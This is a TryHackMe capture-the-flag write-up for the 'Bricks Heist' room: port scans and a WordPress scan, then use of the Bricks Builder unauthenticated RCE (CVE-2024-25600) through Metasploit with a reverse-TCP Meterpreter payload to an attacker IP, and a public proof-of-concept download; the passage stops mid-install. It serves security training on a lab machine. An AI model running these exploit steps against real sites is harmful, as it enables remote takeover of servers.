TryHack3M: Bricks Heist

License

The following post by anthonyjsaab is licensed under

0 - Introduction

Link to room:

Machine version: Brick.By.Brick.v.2.1

This writeup walks you through a room on TryHackMe created by , , , and

1 - Port Scan

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- 10.10.212.66
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:36 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.13s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 482.02 seconds

1b - Versioning and OS fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,443,3306 bricks.thm            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:54 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.11s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:ca:7c:7d:3c:0e:8c:8c:0f:b0:f7:94:74:02:fa:ce (RSA)
|   256 0a:6f:7b:f1:94:df:5f:91:59:9e:d5:97:d0:55:29:54 (ECDSA)
|_  256 a2:f2:7a:f1:12:42:c3:72:ec:3a:ed:9c:d9:11:30:46 (ED25519)
80/tcp   open  http     WebSockify Python/3.8.10
|_http-title: Error response
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:54:18 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:54:18 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-server-header: WebSockify Python/3.8.10
443/tcp  open  ssl/http Apache httpd
| tls-alpn: 
|   h2
|_  http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after:  2025-04-02T11:59:14
|_http-title: Brick by Brick
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/3%Time=6634C25D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x
SF:20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\x202024\x
SF:2010:54:18\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PU
SF:BLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\
SF:x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head
SF:>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x2
SF:0response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x2040
SF:5</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20
SF:Allowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:54:18\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n
SF:\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\
SF:x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1
SF:>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20co
SF:de:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x
SF:20\x20</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.33 seconds

We can see that Apache is running on port 443, and that Wordpress is installed on that server.

1c - Vulners

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p22,80,443,3306 bricks.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:57 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.10s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2012-1577	7.5	https://vulners.com/cve/CVE-2012-1577
|     	PRION:CVE-2020-15778	6.8	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2020-12062	5.0	https://vulners.com/prion/PRION:CVE-2020-12062
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	CVE-2010-4816	5.0	https://vulners.com/cve/CVE-2010-4816
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2021-41617	4.4	https://vulners.com/prion/PRION:CVE-2021-41617
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	PRION:CVE-2016-20012	4.3	https://vulners.com/prion/PRION:CVE-2016-20012
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	CVE-2023-51767	3.5	https://vulners.com/cve/CVE-2023-51767
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp   open  http     WebSockify Python/3.8.10
|_http-server-header: WebSockify Python/3.8.10
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:57:13 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 472
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 405</p>
|     <p>Message: Method Not Allowed.</p>
|     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.8.10
|     Date: Fri, 03 May 2024 10:57:14 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
3306/tcp open  mysql    MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/3%Time=6634C30C%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x
SF:20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\x202024\x
SF:2010:57:13\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PU
SF:BLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\
SF:x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head
SF:>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x2
SF:0response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x2040
SF:5</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20
SF:Allowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:57:14\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20H
SF:TML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n
SF:\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\
SF:x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1
SF:>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20co
SF:de:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x
SF:20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds

Nothing interesting in the above output

2 - Wordpress (443)

┌──(kali㉿kali)-[~]
└─$ wpscan --url https://bricks.thm --disable-tls-checks --api-token REDACTED_BY_ME
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://bricks.thm/ [10.10.212.66]
[+] Started: Fri May  3 14:12:10 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: https://bricks.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: https://bricks.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
 | Found By: Rss Generator (Passive Detection)
 |  - https://bricks.thm/feed/, <generator>https://wordpress.org/?v=6.5</generator>
 |  - https://bricks.thm/comments/feed/, <generator>https://wordpress.org/?v=6.5</generator>
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
 |     Fixed in: 6.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/

[+] WordPress theme in use: bricks
 | Location: https://bricks.thm/wp-content/themes/bricks/
 | Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
 | Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
 | Style Name: Bricks
 | Style URI: https://bricksbuilder.io/
 | Description: Visual website builder for WordPress....
 | Author: Bricks
 | Author URI: https://bricksbuilder.io/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
 |     Fixed in: 1.9.6.1
 |     References:
  |      - https://wpscan.com/vulnerability/8bab5266-7154-4b65-b5bc-07a91b28be42
 |      - https://twitter.com/calvinalkan/status/1757441538164994099
 |      - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
 |
 | [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
 |     Fixed in: 1.9.6.1
 |     References:
 |      - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/b97b1c86-22a4-462b-9140-55139cf02c7a
 |
 | Version: 1.9.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:05 <====================> (137 / 137) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Fri May  3 14:12:22 2024
[+] Requests Done: 143
[+] Cached Requests: 38
[+] Data Sent: 35.385 KB
[+] Data Received: 57.585 KB
[+] Memory used: 255.609 MB
[+] Elapsed time: 00:00:12

This is very interesting: a very recent unauthd RCE vulnerability has been detected on the target server.

3 - Foothold

3a - Metasploit

msf6 > search bricks

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_bricks_builder_rce  2024-02-19       excellent  Yes    Unauthenticated RCE in Bricks Builder Theme
   1    \_ target: Automatic                    .                .          .      .
   2    \_ target: PHP In-Memory                .                .          .      .
   3    \_ target: Unix In-Memory               .                .          .      .
   4    \_ target: Windows In-Memory            .                .          .      .


Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_bricks_builder_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'

msf6 > use 1
[*] Additionally setting TARGET => Automatic
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > show options

Module options (exploit/multi/http/wp_bricks_builder_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using
                                         -metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_bricks_builder_rce) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS bricks.thm
RHOST => bricks.thm
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RPORT 443
RPORT => 443
msf6 exploit(multi/http/wp_bricks_builder_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. WordPress does not appear to be online. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS 10.10.239.202
RHOSTS => 10.10.239.202
msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.239.202:46644) at 2024-05-04 09:18:09 +0300


meterpreter >

3b - First flag

meterpreter > ls
Listing: /data/www/default
==========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  523    fil   2024-04-02 14:13:36 +0300  .htaccess
100644/rw-r--r--  43     fil   2024-04-05 15:39:01 +0300  FLAG_REDACTED.txt
100644/rw-r--r--  405    fil   2024-04-02 14:12:03 +0300  index.php
040755/rwxr-xr-x  4096   dir   2023-04-12 03:53:55 +0300  kod
100644/rw-r--r--  19915  fil   2024-04-04 18:15:40 +0300  license.txt
040755/rwxr-xr-x  4096   dir   2024-04-02 14:03:35 +0300  phpmyadmin
100644/rw-r--r--  7401   fil   2024-04-04 18:15:40 +0300  readme.html
100644/rw-r--r--  7387   fil   2024-04-04 18:15:40 +0300  wp-activate.php
040755/rwxr-xr-x  4096   dir   2024-04-02 14:12:03 +0300  wp-admin
100644/rw-r--r--  351    fil   2024-04-02 14:12:03 +0300  wp-blog-header.php
100644/rw-r--r--  2323   fil   2024-04-02 14:12:03 +0300  wp-comments-post.php
100644/rw-r--r--  3012   fil   2024-04-04 18:15:40 +0300  wp-config-sample.php
100666/rw-rw-rw-  3288   fil   2024-04-02 14:12:39 +0300  wp-config.php
040755/rwxr-xr-x  4096   dir   2024-05-04 09:19:23 +0300  wp-content
100644/rw-r--r--  5638   fil   2024-04-02 14:12:03 +0300  wp-cron.php
040755/rwxr-xr-x  16384  dir   2024-04-04 18:15:40 +0300  wp-includes
100644/rw-r--r--  2502   fil   2024-04-02 14:12:03 +0300  wp-links-opml.php
100644/rw-r--r--  3927   fil   2024-04-02 14:12:03 +0300  wp-load.php
100644/rw-r--r--  50917  fil   2024-04-04 18:15:40 +0300  wp-login.php
100644/rw-r--r--  8525   fil   2024-04-02 14:12:03 +0300  wp-mail.php
100644/rw-r--r--  28427  fil   2024-04-04 18:15:40 +0300  wp-settings.php
100644/rw-r--r--  34385  fil   2024-04-02 14:12:03 +0300  wp-signup.php
100644/rw-r--r--  4885   fil   2024-04-02 14:12:03 +0300  wp-trackback.php
100644/rw-r--r--  3246   fil   2024-04-04 18:15:40 +0300  xmlrpc.php

3c - Going from meterpreter to stable shell

Something very annoying is happening: every time I try to spawn a shell using meterpreter, or try to execute any command on the target machine, the meterpreter session dies.

msf6 exploit(multi/http/wp_bricks_builder_rce) > run

[*] Started reverse TCP handler on 10.11.85.12:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 5 opened (10.11.85.12:4444 -> 10.10.239.202:35094) at 2024-05-04 09:50:22 +0300

meterpreter > shell

[*] 10.10.239.202 - Meterpreter session 5 closed.  Reason: Died

That is why I chose to go with another exploit implementation:

┌──(kali㉿kali)-[~]
└─$ wget https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
--2024-05-04 10:23:54--  https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main [following]
--2024-05-04 10:23:55--  https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 140.82.121.10
Connecting to codeload.github.com (codeload.github.com)|140.82.121.10|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’

main.zip                       [ <=>                                  ]   5.28K  --.-KB/s    in 0.1s    

2024-05-04 10:23:59 (50.4 KB/s) - ‘main.zip’ saved [5411]

                                                                                                         
┌──(kali㉿kali)-[~]
└─$ unzip main.zip 
Archive:  main.zip
19e80ce8c448bccc2fcca161ebf76db569a14b19
   creating: CVE-2024-25600-main/
  inflating: CVE-2024-25600-main/README.md  
  inflating: CVE-2024-25600-main/exploit.py  
 extracting: CVE-2024-25600-main/requirements.txt  
                                                                                                         
┌──(kali㉿kali)-[~]
└─$ cd CVE-2024-25600-main/ 
                                                                                                         
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python -m venv venv
                                                                                                         
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ source venv/bin/activate
                                                                                                         
┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ pip install -r requirements.txt 
Collecting alive_progress (from -r requirements.txt (line 1))
  Downloading alive_progress-3.1.5-py3-none-any.whl.metadata (68 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 68.4/68.4 kB 136.8 kB/s eta 0:00:00
Collecting bs4 (from -r requirements.txt (line 2))
  Downloading bs4-0.0.2-py2.py3-none-any.whl.metadata (411 bytes)
Collecting prompt_toolkit (from -r requirements.txt (line 3))
  Downloading prompt_toolkit-3.0.43-py3-none-any.whl.metadata (6.5 kB)
Collecting requests (from -r requirements.txt (line 4))
  Downloading requests-2.31.0-py3-none-any.whl.metadata (4.6 kB)
Collecting rich (from -r requirements.txt (line 5))
  Downloading rich-13.7.1-py3-none-any.whl.metadata (18 kB)
Collecting about-time==4.2.1 (from alive_progress->-r requirements.txt (line 1))
  Downloading about_time-4.2.1-py3-none-any.whl.metadata (13 kB)
Collecting grapheme==0.6.0 (from alive_progress->-r requirements.txt (line 1))
  Downloading grapheme-0.6.0.tar.gz (207 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 207.3/207.3 kB 14.0 kB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Collecting beautifulsoup4 (from bs4->-r requirements.txt (line 2))
  Downloading beautifulsoup4-4.12.3-py3-none-any.whl.metadata (3.8 kB)
Collecting wcwidth (from prompt_toolkit->-r requirements.txt (line 3))
  Downloading wcwidth-0.2.13-py2.py3-none-any.whl.metadata (14 kB)
Collecting charset-normalizer<4,>=2 (from requests->-r requirements.txt (line 4))
  Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (33 kB)
Collecting idna<4,>=2.5 (from requests->-r requirements.txt (line 4))
  Downloading idna-3.7-py3-none-any.whl.metadata (9.9 kB)
Collecting urllib3<3,>=1.21.1 (from requests->-r requirements.txt (line 4))
  Downloading urllib3-2.2.1-py3-none-any.whl.metadata (6.4 kB)
Collecting certifi>=2017.4.17 (from requests->-r requirements.txt (line 4))
  Downloading certifi-2024.2.2-py3-none-any.whl.metadata (2.2 kB)
Collecting markdown-it-py>=2.2.0 (from rich->-r requirements.txt (line 5))
  Downloading markdown_it_py-3.0.0-py3-none-any.whl.metadata (6.9 kB)
Collecting pygments<3.0.0,>=2.13.0 (from rich->-r requirements.txt (line 5))
